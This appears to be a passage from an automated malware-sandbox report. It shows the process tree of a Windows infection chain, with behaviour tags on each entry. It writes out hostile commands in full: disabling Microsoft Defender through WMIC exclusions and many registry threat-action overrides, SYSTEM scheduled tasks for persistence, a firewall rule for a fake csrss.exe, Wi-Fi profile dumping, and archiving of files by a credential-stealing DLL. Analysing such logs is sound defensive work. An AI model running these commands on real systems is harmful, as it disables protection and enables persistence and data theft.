C:\Windows\SysWOW64\cmd.exe/C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True8⤵PID:5496
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True9⤵
- Command and Scripting Interpreter: PowerShell
PID:5432 -
C:\Windows\SysWOW64\Wbem\WMIC.exe"C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True10⤵PID:5868
-
-
-
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "bbmnnUCIPYyTQrzMQJ" /SC once /ST 22:28:00 /RU "SYSTEM" /TR "\"C:\Users\Admin\AppData\Local\Temp\7zS80E3.tmp\Install.exe\" it /yGTdiduRiv 385118 /S" /V1 /F7⤵
- Drops file in Windows directory
- Creates scheduled task(s)
PID:4960
-
-
C:\Windows\SysWOW64\forfiles.exe"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m waitfor.exe /c "cmd /C schtasks /run /I /tn bbmnnUCIPYyTQrzMQJ"7⤵PID:2876
-
C:\Windows\SysWOW64\cmd.exe/C schtasks /run /I /tn bbmnnUCIPYyTQrzMQJ8⤵PID:2764
-
\??\c:\windows\SysWOW64\schtasks.exeschtasks /run /I /tn bbmnnUCIPYyTQrzMQJ9⤵PID:5704
-
-
-
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\1000079001\gold.exe"C:\Users\Admin\AppData\Local\Temp\1000079001\gold.exe"3⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious use of WriteProcessMemory
PID:2796 -
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"4⤵PID:4812
-
-
-
C:\Users\Admin\AppData\Local\Temp\1000080001\alexxxxxxxx.exe"C:\Users\Admin\AppData\Local\Temp\1000080001\alexxxxxxxx.exe"3⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
PID:2744 -
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"4⤵PID:4872
-
C:\Users\Admin\AppData\Roaming\configurationValue\keks.exe"C:\Users\Admin\AppData\Roaming\configurationValue\keks.exe"5⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4280
-
-
C:\Users\Admin\AppData\Roaming\configurationValue\trf.exe"C:\Users\Admin\AppData\Roaming\configurationValue\trf.exe"5⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:236
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C choice /C Y /N /D Y /T 3 & Del "RegAsm.exe"5⤵PID:5320
-
C:\Windows\SysWOW64\choice.exechoice /C Y /N /D Y /T 36⤵PID:1760
-
-
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2744 -s 5044⤵
- Program crash
PID:592
-
-
-
C:\Windows\SysWOW64\rundll32.exe"C:\Windows\System32\rundll32.exe" C:\Users\Admin\AppData\Roaming\a091ec0a6e2227\cred64.dll, Main3⤵
- Loads dropped DLL
PID:3056 -
C:\Windows\system32\rundll32.exe"C:\Windows\System32\rundll32.exe" C:\Users\Admin\AppData\Roaming\a091ec0a6e2227\cred64.dll, Main4⤵
- Blocklisted process makes network request
- Loads dropped DLL
- Suspicious behavior: EnumeratesProcesses
PID:2696 -
C:\Windows\system32\netsh.exenetsh wlan show profiles5⤵PID:2100
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command Compress-Archive -Path 'C:\Users\Admin\AppData\Local\Temp\_Files_\' -DestinationPath 'C:\Users\Admin\AppData\Local\Temp\699363923187_Desktop.zip' -CompressionLevel Optimal5⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1044
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\1000081001\install.exe"C:\Users\Admin\AppData\Local\Temp\1000081001\install.exe"3⤵
- Executes dropped EXE
- Drops file in Program Files directory
PID:2552 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Program Files (x86)\GameSyncLink\installg.bat" "4⤵PID:68
-
C:\Windows\SysWOW64\sc.exeSc stop GameServerClient5⤵
- Launches sc.exe
PID:1572
-
-
C:\Program Files (x86)\GameSyncLink\GameService.exeGameService remove GameServerClient confirm5⤵
- Executes dropped EXE
PID:4560
-
-
C:\Windows\SysWOW64\sc.exeSc delete GameSyncLink5⤵
- Launches sc.exe
PID:4908
-
-
C:\Program Files (x86)\GameSyncLink\GameService.exeGameService remove GameSyncLink confirm5⤵
- Executes dropped EXE
PID:4116
-
-
C:\Program Files (x86)\GameSyncLink\GameService.exeGameService install GameSyncLink "C:\Program Files (x86)\GameSyncLink\GameSyncLink.exe"5⤵
- Executes dropped EXE
PID:1628
-
-
C:\Program Files (x86)\GameSyncLink\GameService.exeGameService start GameSyncLink5⤵
- Executes dropped EXE
PID:4652
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Program Files (x86)\GameSyncLink\installc.bat" "4⤵PID:1504
-
C:\Windows\SysWOW64\sc.exeSc stop GameServerClientC5⤵
- Launches sc.exe
PID:1076
-
-
C:\Program Files (x86)\GameSyncLink\GameService.exeGameService remove GameServerClientC confirm5⤵
- Executes dropped EXE
PID:4728
-
-
C:\Windows\SysWOW64\sc.exeSc delete PiercingNetLink5⤵
- Launches sc.exe
PID:1100
-
-
C:\Program Files (x86)\GameSyncLink\GameService.exeGameService remove PiercingNetLink confirm5⤵
- Executes dropped EXE
PID:5100
-
-
C:\Program Files (x86)\GameSyncLink\GameService.exeGameService install PiercingNetLink "C:\Program Files (x86)\GameSyncLink\PiercingNetLink.exe"5⤵
- Executes dropped EXE
PID:4304
-
-
C:\Program Files (x86)\GameSyncLink\GameService.exeGameService start PiercingNetLink5⤵
- Executes dropped EXE
PID:648
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Program Files (x86)\GameSyncLink\installm.bat" "4⤵PID:2892
-
C:\Windows\SysWOW64\sc.exeSc delete GameSyncLinks5⤵
- Launches sc.exe
PID:1368
-
-
C:\Program Files (x86)\GameSyncLink\GameService.exeGameService remove GameSyncLinks confirm5⤵
- Executes dropped EXE
PID:596
-
-
C:\Program Files (x86)\GameSyncLink\GameService.exeGameService install GameSyncLinks "C:\Program Files (x86)\GameSyncLink\GameSyncLinks.exe"5⤵
- Executes dropped EXE
PID:4368
-
-
C:\Program Files (x86)\GameSyncLink\GameService.exeGameService start GameSyncLinks5⤵
- Executes dropped EXE
PID:4232
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\7ZSfx000.cmd" "4⤵PID:4888
-
-
-
C:\Windows\SysWOW64\rundll32.exe"C:\Windows\System32\rundll32.exe" C:\Users\Admin\AppData\Roaming\a091ec0a6e2227\clip64.dll, Main3⤵
- Blocklisted process makes network request
- Loads dropped DLL
PID:4296
-
-
C:\Users\Admin\AppData\Local\Temp\1000088001\NewB.exe"C:\Users\Admin\AppData\Local\Temp\1000088001\NewB.exe"3⤵
- Executes dropped EXE
PID:2592 -
C:\Windows\SysWOW64\schtasks.exe"C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /MO 1 /TN NewB.exe /TR "C:\Users\Admin\AppData\Local\Temp\1000088001\NewB.exe" /F4⤵
- Creates scheduled task(s)
PID:4268
-
-
C:\Users\Admin\AppData\Local\Temp\1000238001\ISetup8.exe"C:\Users\Admin\AppData\Local\Temp\1000238001\ISetup8.exe"4⤵
- Executes dropped EXE
PID:4904 -
C:\Users\Admin\AppData\Local\Temp\u3s8.0.exe"C:\Users\Admin\AppData\Local\Temp\u3s8.0.exe"5⤵PID:2216
-
-
C:\Users\Admin\AppData\Local\Temp\u3s8.1.exe"C:\Users\Admin\AppData\Local\Temp\u3s8.1.exe"5⤵
- Checks SCSI registry key(s)
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
PID:5412
-
-
-
C:\Users\Admin\AppData\Local\Temp\1000239001\toolspub1.exe"C:\Users\Admin\AppData\Local\Temp\1000239001\toolspub1.exe"4⤵
- Executes dropped EXE
- Checks SCSI registry key(s)
PID:3052 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3052 -s 4925⤵
- Program crash
PID:5300
-
-
-
C:\Users\Admin\AppData\Local\Temp\1000240001\4767d2e713f2021e8fe856e3ea638b58.exe"C:\Users\Admin\AppData\Local\Temp\1000240001\4767d2e713f2021e8fe856e3ea638b58.exe"4⤵
- Executes dropped EXE
PID:4860 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -nologo -noprofile5⤵
- Command and Scripting Interpreter: PowerShell
PID:428
-
-
C:\Users\Admin\AppData\Local\Temp\1000240001\4767d2e713f2021e8fe856e3ea638b58.exe"C:\Users\Admin\AppData\Local\Temp\1000240001\4767d2e713f2021e8fe856e3ea638b58.exe"5⤵
- Windows security bypass
- Windows security modification
- Adds Run key to start application
- Checks for VirtualBox DLLs, possible anti-VM trick
- Drops file in Windows directory
PID:4192 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -nologo -noprofile6⤵
- Command and Scripting Interpreter: PowerShell
- Drops file in System32 directory
PID:4232
-
-
C:\Windows\System32\cmd.exeC:\Windows\Sysnative\cmd.exe /C "netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes"6⤵PID:3800
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes7⤵
- Modifies Windows Firewall
PID:2692
-
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -nologo -noprofile6⤵
- Command and Scripting Interpreter: PowerShell
- Drops file in System32 directory
PID:1628
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -nologo -noprofile6⤵
- Command and Scripting Interpreter: PowerShell
- Drops file in System32 directory
- Modifies data under HKEY_USERS
PID:2448
-
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\09fd851a4f\explorha.exeC:\Users\Admin\AppData\Local\Temp\09fd851a4f\explorha.exe1⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious behavior: EnumeratesProcesses
PID:4772
-
C:\Program Files (x86)\GameSyncLink\GameService.exe"C:\Program Files (x86)\GameSyncLink\GameService.exe"1⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
PID:3828 -
C:\Program Files (x86)\GameSyncLink\GameSyncLink.exe"C:\Program Files (x86)\GameSyncLink\GameSyncLink.exe"2⤵
- Executes dropped EXE
PID:2708
-
-
C:\Program Files (x86)\GameSyncLink\GameSyncLink.exe"C:\Program Files (x86)\GameSyncLink\GameSyncLink.exe"2⤵
- Executes dropped EXE
PID:4368
-
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV12⤵PID:1572
-
-
C:\Program Files (x86)\GameSyncLink\GameSyncLink.exe"C:\Program Files (x86)\GameSyncLink\GameSyncLink.exe"2⤵
- Executes dropped EXE
PID:360
-
-
C:\Program Files (x86)\GameSyncLink\GameSyncLink.exe"C:\Program Files (x86)\GameSyncLink\GameSyncLink.exe"2⤵
- Executes dropped EXE
PID:5768
-
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV12⤵PID:5504
-
-
C:\Program Files (x86)\GameSyncLink\GameSyncLink.exe"C:\Program Files (x86)\GameSyncLink\GameSyncLink.exe"2⤵
- Executes dropped EXE
PID:5216
-
-
C:\Program Files (x86)\GameSyncLink\GameSyncLink.exe"C:\Program Files (x86)\GameSyncLink\GameSyncLink.exe"2⤵
- Executes dropped EXE
PID:5388
-
-
C:\Program Files (x86)\GameSyncLink\GameSyncLink.exe"C:\Program Files (x86)\GameSyncLink\GameSyncLink.exe"2⤵PID:5740
-
-
C:\Program Files (x86)\GameSyncLink\GameSyncLink.exe"C:\Program Files (x86)\GameSyncLink\GameSyncLink.exe"2⤵PID:728
-
-
C:\Program Files (x86)\GameSyncLink\GameService.exe"C:\Program Files (x86)\GameSyncLink\GameService.exe"1⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
PID:4560 -
C:\Program Files (x86)\GameSyncLink\PiercingNetLink.exe"C:\Program Files (x86)\GameSyncLink\PiercingNetLink.exe"2⤵
- Executes dropped EXE
PID:504
-
-
C:\Program Files (x86)\GameSyncLink\PiercingNetLink.exe"C:\Program Files (x86)\GameSyncLink\PiercingNetLink.exe"2⤵
- Executes dropped EXE
PID:4228
-
-
C:\Program Files (x86)\GameSyncLink\PiercingNetLink.exe"C:\Program Files (x86)\GameSyncLink\PiercingNetLink.exe"2⤵
- Executes dropped EXE
PID:4352
-
-
C:\Program Files (x86)\GameSyncLink\PiercingNetLink.exe"C:\Program Files (x86)\GameSyncLink\PiercingNetLink.exe"2⤵
- Executes dropped EXE
PID:2796
-
-
C:\Program Files (x86)\GameSyncLink\PiercingNetLink.exe"C:\Program Files (x86)\GameSyncLink\PiercingNetLink.exe"2⤵
- Executes dropped EXE
PID:1436
-
-
C:\Program Files (x86)\GameSyncLink\PiercingNetLink.exe"C:\Program Files (x86)\GameSyncLink\PiercingNetLink.exe"2⤵
- Executes dropped EXE
PID:5572
-
-
C:\Program Files (x86)\GameSyncLink\PiercingNetLink.exe"C:\Program Files (x86)\GameSyncLink\PiercingNetLink.exe"2⤵PID:5360
-
-
C:\Program Files (x86)\GameSyncLink\PiercingNetLink.exe"C:\Program Files (x86)\GameSyncLink\PiercingNetLink.exe"2⤵PID:2536
-
-
C:\Program Files (x86)\GameSyncLink\GameService.exe"C:\Program Files (x86)\GameSyncLink\GameService.exe"1⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
PID:2464 -
C:\Program Files (x86)\GameSyncLink\GameSyncLinks.exe"C:\Program Files (x86)\GameSyncLink\GameSyncLinks.exe"2⤵
- Executes dropped EXE
PID:4412
-
-
C:\Program Files (x86)\GameSyncLink\GameSyncLinks.exe"C:\Program Files (x86)\GameSyncLink\GameSyncLinks.exe"2⤵
- Executes dropped EXE
PID:2564
-
-
C:\Program Files (x86)\GameSyncLink\GameSyncLinks.exe"C:\Program Files (x86)\GameSyncLink\GameSyncLinks.exe"2⤵
- Executes dropped EXE
PID:4036
-
-
C:\Program Files (x86)\GameSyncLink\GameSyncLinks.exe"C:\Program Files (x86)\GameSyncLink\GameSyncLinks.exe"2⤵
- Executes dropped EXE
PID:5756
-
-
C:\Program Files (x86)\GameSyncLink\GameSyncLinks.exe"C:\Program Files (x86)\GameSyncLink\GameSyncLinks.exe"2⤵
- Executes dropped EXE
PID:5476
-
-
C:\Program Files (x86)\GameSyncLink\GameSyncLinks.exe"C:\Program Files (x86)\GameSyncLink\GameSyncLinks.exe"2⤵
- Executes dropped EXE
PID:3824
-
-
C:\Program Files (x86)\GameSyncLink\GameSyncLinks.exe"C:\Program Files (x86)\GameSyncLink\GameSyncLinks.exe"2⤵PID:4816
-
-
C:\Program Files (x86)\GameSyncLink\GameSyncLinks.exe"C:\Program Files (x86)\GameSyncLink\GameSyncLinks.exe"2⤵PID:2324
-
-
\??\c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k localsystemnetworkrestricted -s fhsvc1⤵PID:5360
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -s WPDBusEnum1⤵PID:5356
-
C:\Users\Admin\AppData\Local\Temp\7zS1C7C.tmp\Install.exeC:\Users\Admin\AppData\Local\Temp\7zS1C7C.tmp\Install.exe it /NhedidIXUK 385118 /S1⤵
- Executes dropped EXE
- Drops desktop.ini file(s)
- Drops file in System32 directory
PID:5780 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"2⤵PID:5640
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6"3⤵PID:5644
-
C:\Windows\SysWOW64\cmd.exe/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 64⤵PID:5636
-
\??\c:\windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 65⤵PID:5732
-
-
-
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6"3⤵PID:5580
-
C:\Windows\SysWOW64\cmd.exe/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 64⤵PID:5568
-
\??\c:\windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 65⤵PID:588
-
-
-
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6"3⤵PID:5300
-
C:\Windows\SysWOW64\cmd.exe/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 64⤵PID:5256
-
\??\c:\windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 65⤵PID:5264
-
-
-
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6"3⤵PID:2884
-
C:\Windows\SysWOW64\cmd.exe/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 64⤵PID:2840
-
\??\c:\windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 65⤵PID:4488
-
-
-
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"3⤵PID:5892
-
C:\Windows\SysWOW64\cmd.exe/C powershell start-process -WindowStyle Hidden gpupdate.exe /force4⤵PID:5960
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell start-process -WindowStyle Hidden gpupdate.exe /force5⤵
- Command and Scripting Interpreter: PowerShell
- Drops file in System32 directory
PID:1268 -
C:\Windows\SysWOW64\gpupdate.exe"C:\Windows\system32\gpupdate.exe" /force6⤵PID:3404
-
-
-
-
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147807942\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147807942\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737394\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737394\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147841147\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147841147\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"359386\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"359386\" /t REG_SZ /d 6 /reg:64;"2⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
PID:4192 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:323⤵PID:5152
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:324⤵PID:3624
-
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:643⤵PID:6100
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 256596 /t REG_SZ /d 6 /reg:323⤵PID:6088
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 256596 /t REG_SZ /d 6 /reg:643⤵PID:5508
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 242872 /t REG_SZ /d 6 /reg:323⤵PID:4248
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 242872 /t REG_SZ /d 6 /reg:643⤵PID:5512
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749373 /t REG_SZ /d 6 /reg:323⤵PID:5688
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749373 /t REG_SZ /d 6 /reg:643⤵PID:5704
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147807942 /t REG_SZ /d 6 /reg:323⤵PID:5700
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147807942 /t REG_SZ /d 6 /reg:643⤵PID:4616
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735735 /t REG_SZ /d 6 /reg:323⤵PID:924
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735735 /t REG_SZ /d 6 /reg:643⤵PID:5736
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737010 /t REG_SZ /d 6 /reg:323⤵PID:5740
-
-
